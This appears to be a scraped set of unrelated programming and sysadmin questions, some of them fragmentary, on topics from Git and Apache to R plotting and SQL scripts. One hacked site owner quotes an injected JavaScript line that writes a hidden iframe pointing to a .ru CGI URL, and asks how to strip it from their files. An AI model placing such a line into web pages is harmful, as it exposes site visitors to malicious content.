  How can I do this cleanly without gotos? loop: if(condition1){ something(); } else if (condition2) { somethingDifferent(); } else { mostOfTheWork(); goto loop; } I'd prefer not to use breaks as well. Furthermore, it is expected to loop several (adv 40) times before doing something else, so the mostOfTheWork part would most likely be as high up as possible, even if just for readability.   Howdy, folks! First time here -- thought I'd field a question on behalf of a coworker. Somebody in my lab is doing a content analysis (e.g. reading an article or transcript line by line and identifying relevant themes) of the web presences of various privatized neuroimaging centers (e.g. http://www.canmagnetic.com/). She's been c/ping entire site maps by hand, and I know I could slap something together with Python to follow links and dump full text (with line numbers) for her, but I've never actually done anything quite like this. • GIT not functionnal on Mac OS X Lion?

  I am trying to use GIT to manage my computing projects. But all commands using GIT do not respond on my terminal. For example if I try git --version followed by entry keyboard typing, a blank line appear and wait until ever. If I type again the entry key on my keyboard the command line is again available but nothing appear. It's the same for all git function that I type. Do you have any solution or explanation for this ?

• How do I remove database name from SQL Server generated script?

  Anytime I use 'script table as' - 'Insert To' (or other command), the script generated automatically places the database name in the script. Such as: INSERT INTO [DatabaseName].[dbo].[tblToBeInserted] ... While not a huge problem to just delete it, it has slipped by a few times and the script breaks if run on a different server with a different database name but has the same schema. (Such as running on [DatabaseName.Test]) Is there an option I can change, or can I modify the output in any way to remove this?

• How does the #! work?

  In a script you must include a #! on the first line followed by the path to the program that will execute the script (e.g.: sh, perl). As far as I know though, the # character denotes the start of a comment and that line is supposed to be ignored by the program executing the script. It would seem though, that this first line is at some point read by something in order for the script to be executed by the proper program. Could somebody please shed more light on the workings of the #! ? Edit: I'm really curious about this, so the more in-depth the answer the better.

  I know I can create a plot with line and dots using the type = "o" argument in the plot command. I would like some more control over this -- I want to be able to draw the "o" as full dots, with black border and fill-in color of my choice, of customized size and of a different color than the line. Same for the line, I want to make it thicker, and of my choice of color. How would I go on about doing that? What I found until now is just a plain plot(y, type= "o") which is too poor for my needs. I am not interested in using ggplot, but instead use the internal plot library of R. Any help appreciated.

If it contains single quotes or line breaks or others, the above code will break. And I do not have access to the server-side code. What's the easiest way to "escape" the contents of $str_from_server into a javascript string, and then it can be restored later?

  I have a tab delimeted file that I want to convert into a mysql table. there are 25 tab delimeted fields in the text file. I can get the values in when I construct the SQL statement word by word and get each value individually stated in the VALUES part but when I try to get the list as a whole it does not work. Here is the code. I couldn't figure it out.   This is really weird. Whenever I call something like if(empty($this->input->post("foo")){//blabla} The whole PHP is "down" and I get a blank page from the website (even when I don't pass through this empty(input) line). I know this is not the right method and it is stupid, I change the code to if(!$this->input->post("foo")){//blabla} Better I guess ? Seriously, how come the empty(input) breaks down the entire PHP page ? (I can't get any echo "something").

  I was hacked and have hundreds of .js files with this line of code that I'm trying to get rid of: ;document.write('<iframe src="http://sitecorporatemanagement.ru/pretzellogmeins.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); It is the last line of the file, but I think the file contains windows line endings, because when ever I do this: sed -i '/sitecorporatemanagement.ru/d' * it deletes the full content of the file.   I'm writing a macro in Visual Basic for PowerPoint 2010. I'd like to initialize a really big list of strings like: big_ol_array = Array( _ "string1", _ "string2", _ "string3", _ "string4" , _ ..... "string9999" _ ) ...but I get the "Too many line continuations" error in the editor. When I try to just initialize the big array with no line breaks, the VB editor can't handle such a long line (1000+) characters. Does anyone know a good way to initialize a huge list of strings in VB? Thanks in advance!

• Upgraded to Ubuntu 13.10 - Apache not able to start

  I updated to Ubuntu 13.10 (from Ubuntu 13.04) last weekend, and now Apache is not being able to start. It was working perfectly well until the upgraded, and I haven't changed anything myself. When I ran a restart this is what I get apache2: Syntax error on line 260 of /etc/apache2/apache2.conf: Could not open configuration file /etc/apache2/conf.d/: No such file or directory So, I created the directory, and then I get this: * Starting web server apache2 * * The apache2 configtest failed. • Google Chrome proxy settings?

  When I try to set Google Chrome's proxy settings (on chrome://linux-proxy-config/), I get the following message: When running Google Chrome under a supported desktop environment, the system proxy settings will be used. However, either your system is not supported or there was a problem launching your system configuration. But you can still configure via the command line. Please see man google-chrome-stable for more information on flags and environment variables. I need to set proxy settings to use Chrome, but I don't want to be setting them in the command line every time I use Chrome. Is there a way to set these settings permanently? Also, is there an option in Chrome so that it doesn't use proxy for specific domains (analogous to the No proxy for setting in Firefox)?

• Firefox not detecting Flash 11

  I installed the Flash 11 plugin using the software center (and have also removed the reinstalled it via command-line in the terminal), yet Firefox still claims the latest version of the plugin I have is 10. (And just to clarify, I have been sure to reboot both Firefox and the entire computer after installing). On further investigation (this may be a red herring, pardon) I ran the uname -a command-line in terminal to assure that I was running the 64-bit version of Ubuntu, and received this feedback: 3.0.0-13-generic #22-Ubuntu SMP Wed Nov 2 13:25:36 UTC 2011 i686 i686 i386 GNU/Linux I don't understand the series "i686 i686 i386". Which applies to my version of Ubuntu? Does this mean I've accidentally installed 32-bit Ubuntu? Very much a beginner here - I've combed the threads but have so little understanding what my exact issue is that I haven't been able to find an answer.
